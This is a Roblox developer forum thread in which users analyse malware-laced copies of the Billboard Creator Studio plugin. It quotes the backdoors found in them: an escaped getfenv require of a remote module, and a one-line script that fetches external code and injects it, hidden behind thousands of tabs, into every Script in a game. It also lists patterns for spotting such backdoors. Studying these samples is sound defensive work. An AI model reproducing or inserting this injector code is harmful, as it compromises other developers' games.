I can't find the real Billboard Creator plugin

I don’t think that is possible, you can try by searching a single person in toolbox.

Example of the plugin : image

as it turns out roblox filters out every single name in existence so creating a dummy account is hard and ive been at it for a few minutes

You don’t need a dummy account. It just infects every game you try to edit, so do this on a test place and once you’re done, delete it from your inventory, uninstall it and delete the game.

no i was creating a dummy account out of boredom and why not

1 Like

its malicious i found

getfenv()['\114\101\113\117\105\114\101'](5151855975)

also imma get that module because im bored and i want to see what it does

1 Like

so much for that, it crashed the second i tried to insert that module into the place

1 Like

I think roblox should just ban the creators if they get banned, they still get backdoors.

oldest one is always the real one.

1 Like

Too bad that I can’t search for the oldest one and my slow internet speeds. It’s gonna be a long fun journey for this one plugin…

and also sometimes the page gets smaller so I might click it and have to start over, roblox should really fix this and redesign the dev page faster.

im gonna find it for u. i got a good connection

1 Like

I would not recommend using an autoclicker, it might click the plugin, because the move page thingy will be random when you get to later pages.

1 Like

Very seriously, why haven’t Roblox API/dev/moderation teams been pushed into making even cursory attempts to filter for these obvious exploits?

There are easy patterns to find.

  • Plugins executing encrypted function names.
  • Extremely long string of white space at the beginning of the line to push malicious code to where it isn’t seen
  • Most especially, any time require(some library asset) is called but not in explicit clear text.

Also rampant plugin copying is easily detected. Why is roblox dead set against putting some effort into doing something?

2 Likes
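The three patterns listed in the post above, together with the getfenv()[...] line quoted earlier in the thread, can be checked mechanically over a plugin's exported Lua source. The Python scanner below is an added example, not code from any poster or from Roblox; the rule names, thresholds and function names (scan_lua, decode_escapes) are assumptions made for illustration, and the sample input is constructed from fragments quoted in this thread.

```python
import re
# Lua string literal: single or double quoted, backslash escapes allowed.
STRING = re.compile(r"""(["'])((?:\\.|(?!\1)[^\\\n])*)\1""")
# Decimal (\114) and hex (\x72) escapes inside a string literal.
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|(\d{1,3}))")
# Globals that load or run other code; a hidden spelling of one is the flag.
SENSITIVE = {"require", "getfenv", "setfenv", "loadstring"}
# Environment lookup by key, e.g. getfenv()["require"](id).
ENV_INDEX = re.compile(r"\bgetfenv\s*\(\s*\d*\s*\)\s*\[")
# Whitespace padding built at run time, e.g. ("\t"):rep(4000).
PAD_REP = re.compile(r"""\(\s*["'](?:\\[tn]|\s)+["']\s*\)\s*:\s*rep\s*\(\s*(\d+)""")

def decode_escapes(body):
    """Decode \\114-style escapes into the characters Lua would produce."""
    to_chr = lambda m: chr(int(m[1], 16) if m[1] else int(m[2]))
    return ESCAPE.sub(to_chr, body)

def scan_lua(source, max_indent=80, max_blank=20, max_rep=200):
    """Return (line_number, rule, detail) findings for one script's source."""
    findings, blank = [], 0
    for no, line in enumerate(source.splitlines(), 1):
        code = line.lstrip()
        if not code:  # empty or whitespace-only line
            blank += 1
            continue
        if blank >= max_blank:
            findings.append((no, "code-after-blank-run", f"{blank} blank lines"))
        blank = 0
        indent = len(line) - len(code)
        if indent >= max_indent:
            findings.append((no, "code-after-long-indent", f"{indent} chars"))
        if ENV_INDEX.search(line):
            findings.append((no, "env-indexed-call", "getfenv()[...]"))
        for m in STRING.finditer(line):
            name = decode_escapes(m[2])
            if name != m[2] and name in SENSITIVE:
                findings.append((no, "escaped-name", name))
        for m in PAD_REP.finditer(line):
            if int(m[1]) >= max_rep:
                findings.append((no, "whitespace-padding", f"rep({m[1]})"))
    return findings

# Constructed sample assembled from fragments quoted in this thread.
SAMPLE = "\n".join([
    r"getfenv()['\114\101\113\117\105\114\101'](5151855975)",
    *[""] * 80,
    " " * 300 + "local loaderw = Instance.new('Script')",
    r'I=("\t"):rep(4000)',
])
if __name__ == "__main__": print(*scan_lua(SAMPLE), sep="\n")
```

Each finding is a reason to open that line with line wrap and visible whitespace turned on, not a verdict on the plugin.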

I agree. Roblox should focus more on developers than the general community. Display names and stuff are cool, but they should help developers about viruses and more.

1 Like

I pulled all my plugins out of studio today to figure out which one was being sketchy, honestly wasting hours on fighting these things. At some point today, I bought the actual Load Character Pro plugin by AlreadyPro.

As I start adding my safe plugins back into studio, roblox showed me a recommended plugin - Load Character Pro, and I very nearly clicked to install it, when I see it’s not the right author.
It’s this user: https://www.roblox.com/users/2281607354/profile/

Look at all this amazing stuff they’ve uploaded!

If that doesn’t impress you, you should see the “FX” script they add in to the plugins they duplicate.
image

I don’t see any help from this, it’s not related to the plugin I was talking about.

Sorry Default Tool. Do you still need the link to the correct actual plugin?
I’m putting together a couple links

Edit: I couldn’t find a version of the plugin with no malware, so I cleaned one and uploaded it.

More details on what I found in the next message. If you just want your plugin though - there you go:

– EDIT / UPDATE –

I got a message from someone interested in using this plugin, but they are not sure it’s safe to use my “VerifiedPlugins” branded one, in part because of the sus thumbnail I put on it.

Based on what I’ve seen, nobody should be trusting any plugins or content available in the library. I swear 80% of the ones I look at have malware or unwanted content.

This is my best advice to anyone looking for plugins: Start with toolblox.
They are literally the only safe place to look for plugins.

More info about that here:

From there, use the links on toolblox for those top-tier essential plugins and never the links. You won’t find my cleaned/restored version of Billboard Creator there, though I did apply to have it added to their list.

There are plugins there to help keep your projects safer. I used the toolblox links to install:

  1. GameGuard Anti Virus V2 - this lets you scan your game and your plugins looking for threats.
    It did find all the threats I had marked which is good, but the number of false positives makes it something that I can’t recommend in its current form.
  2. Venom [Intercept Malicious Scripts]
    This disables any scripts that get inserted into your game probably before they do anything. I highly recommend this.

Unfortunately none of that will tell you that any plugin you want to know is safe will be safe. Venom can mitigate the effects.

As for why I used the sketch thumbnail on my plugin, lol - you can search for the VerifiedPlugins Billboard plugin and get 10 results back, 9 of which are malware. I made mine stick out on purpose:

And honestly, if the skeptical emoji on my plugin thumbnail makes you feel unsafe and skeptical about downloading the plugin, that’s how you should feel about every plugin. It’s bad out there.

In the last hour, Roblox recommended yet another copy of the Billboard Creator plugin to me, so I decided to check it. Malware. A new one I didn’t see on the other 7 copies I checked yesterday.

2 Likes

Well, that was disgusting. I looked at the top 7 most favorited results for Billboard. I used the Library API to pick out some targets
https://search.roblox.com/catalog/json?CatalogContext=2&Category=7&Keyword=Billboard&SortType=1

SortType 1 is MostFavorited. The top result has 1231 favorites. You get some json that looks like this:

The other day I wrote a script to help me download and vet plugins and other content.
It puts it in a safe place I can look at it.

I flagged the ones that are malware.

Let’s start with the 2 that are actually from the user meatpillow - the one you mentioned were botted. Both have Malware. No surprise
image
But they both have 0 favorites.

The most popular one has 1,231 favorites. Is it MALWARE? lol, yep.
I diffed all 7 versions to see what each one added.
The most favorited version has this little bit of extra code:

I=("\t"):rep(4000);C=game:GetObjects("rbxassetid://5915747206")[1].Source;S={["389325813"]="5915563830",["1868400649"]="5915565317",["2373501710"]="5915575426",["3239236979"]="5915578889"};for _,V in next,{workspace,game.ServerScriptService,game.ServerStorage}do function F(T)if T:IsA("Script")then function D()N=0;for O,M in next,S do local Z,R=T.Source:gsub(O.."+",M);T.Source=Z;N+=R;end;if N==0 and not T.Source:find(C)then T.Source..="\n\n"..I..C..I;end;end;D()T:GetPropertyChangedSignal("Source"):Connect(D);end;end;V.DescendantAdded:Connect(F);for _,X in next,V:GetDescendants()do F(X)end;end;

I strongly recommend turning on line wrap and visible whitespace to help find these things in the studio editor.

The second favorite is actually probably ok because its malware might be neutralized?
At 623 favorites, Rose Studios’ copy of the plugin is the best because it only contains one bit of malware:

“Studio Detection” is one line of code. You don’t need to create a new script, instance, and inject its source code to then load a module from an external require. Pretty sure.

For now, I think it’s not harmful because the Marketplace api returns this for the target of the asset ID used in the require:

--[[
Roblox product info for 5182026494
AssetTypeId(number): 10
Description(string): [ Content Deleted ]
IsNew(boolean): false
Updated(string): 2020-09-07T23:43:56.997Z
IsLimitedUnique(boolean): false
ProductId(number): 1001788218
MinimumMembershipLevel(number): 0
Created(string): 2020-06-14T19:32:27.94Z
Creator(table): 
Creator.Id(number): 1304272341
Creator.CreatorTargetId(number): 1304272341
Creator.Name(string): Lil_Chickfila
Creator.CreatorType(string): User
IsLimited(boolean): false
ContentRatingTypeId(number): 0
TargetId(number): 5182026494
IsPublicDomain(boolean): true
ProductType(string): User Product
Name(string): [ Content Deleted ]
IsForSale(boolean): false
Sales(number): 0
AssetId(number): 5182026494
IconImageAssetId(number): 0
--]]

But I don’t see why someone can’t re-activate the target of require(5182026494) in the future to do harm.

Specimen rbxassetid_6194265244_1137732556(fav00514)[MALWARE] with 514 favorites has this:

Specimen rbxassetid_6224073468_1140324407(fav00010)[MALWARE] with 10 favorites is an odd one because it does not contain the “Studio Detection” sleeper malware. It’s the cleanest copy of the plugin script.

Except where the script should end, you have

Plugin["Create on Selected Object"].MouseButton1Click:Connect(function()
	local tbl = {}
	for I,v in pairs(Plugin["Scroller"]:GetChildren()) do 
		if v:IsA("Frame") then
			table.insert(tbl, #tbl+1, {TitleText = v.Title.Text, Text = v.Main.Text})
		end
	end
	local selection = game.Selection:Get()[1]
	if selection then 
		local new = script.Board:Clone()
		new.MainScriptRunner.Value.Value = game:GetService("HttpService"):JSONEncode(tbl)
		new.Parent = selection
		new.MainScriptRunner.Disabled = false
	else
		error("You have nothing selected!")
	end
end)

...
( 80 lines of whitespace )
...


wait(4)

... more pages of white space




local naturalnames = {"Debounce","Fix","Welding","AdminLoader","MeshHandler"}

local loaderw = Instance.new("Script")
loaderw.Source = [[



--ADMIN LOADER.
--This is a script that is part of your admin in game.
--Removing/tampering with this script will potentially result in scripts breaking in your game.

... more pages of whitespace

Yeah, no

Specimen rbxassetid_5673998114_1085855255(fav00002)[MALWARE] with two favorites:
image


Maybe someone on the Roblox Dev team wants to run that and see what it does.

So that’s the top 7. I could re-upload a clean version if you need it, I guess?

Seven days ago @Phazenine found this

getfenv()['\114\101\113\117\105\114\101'](5151855975)

So I checked that module. Marketplace api says its name has been changed to “[ Content Deleted ]” just like the sleeper malware most of the other scripts have embedded.

--[[
Roblox product info for 5151855975
AssetTypeId(number): 10
Description(string): [ Content Deleted ]
IsNew(boolean): false
Updated(string): 2020-12-27T14:24:36.5Z
IsLimitedUnique(boolean): false
ProductId(number): 998820906
MinimumMembershipLevel(number): 0
Created(string): 2020-06-08T13:25:26.57Z
Creator(table): 
Creator.Id(number): 1682650115
Creator.CreatorTargetId(number): 1682650115
Creator.Name(string): pandsoliver
Creator.CreatorType(string): User
IsLimited(boolean): false
ContentRatingTypeId(number): 0
TargetId(number): 5151855975
IsPublicDomain(boolean): true
ProductType(string): User Product
Name(string): [ Content Deleted ]
IsForSale(boolean): false
Sales(number): 0
AssetId(number): 5151855975
IconImageAssetId(number): 0
--]]

But the funny thing is the content is not deleted.
MainModule from require(5151855975):

Anyway. That took over an hour of my time, and more time to write it up so… fun.

In closing, please signal boost sleitnick’s video from last week:

1 Like

The reason studio didn’t like when you tried to grab it is that asset 5151855975 contains literally 30,000 instances of a Part named “Part” right in the root of the plugin.

The log from my loader:

  23:23:43.747  Content item 29999 - [29999]:Part  -  Edit - ArkUtil:129
  23:23:43.747  Content item 30000 - [30000]:Part  -  Edit - ArkUtil:129
  23:23:43.747  Content item 30001 - [30001]:Part  -  Edit - ArkUtil:129
  23:23:43.747  Content item 30002 - [30002]:Part  -  Edit - ArkUtil:129
  23:23:43.748  Content item 30003 - [30003]:Part  -  Edit - ArkUtil:129
  23:23:43.748  Successfully copied 30003 content items  -  Edit - ArkUtil:132

My studio wasn’t happy, but it finished. Then I told it

for k,child in pairs( game.ServerStorage.BadIdea.BillboardPluginFinding.rbxassetid_5151855975_998820906:GetChildren()) do if child.Name=="Part" then child.Parent=nil; child:Destroy() end end

and everything is fine. I’m going to limit the content checking script to 100 in case this is a common thing.

Aside from the 30,000 spam parts, it contains a skybox, a Truss block, and an obfuscated MainModule
image

User_x and ProductInfo are put in there by my script.

MainModule is one of these:

MainModule’s entire content is a string of obfuscated code that has to be reversed before it can be executed, but the string itself is a comment inside of --[[ , so ???

I don’t think getfenv()['\114\101\113\117\105\114\101'](5151855975) can actually do anything until the malware author pushes out an update uncommenting the script.
But also, most people probably won’t look into it due to the 30,000 Part instances you have to sort through.

1 Like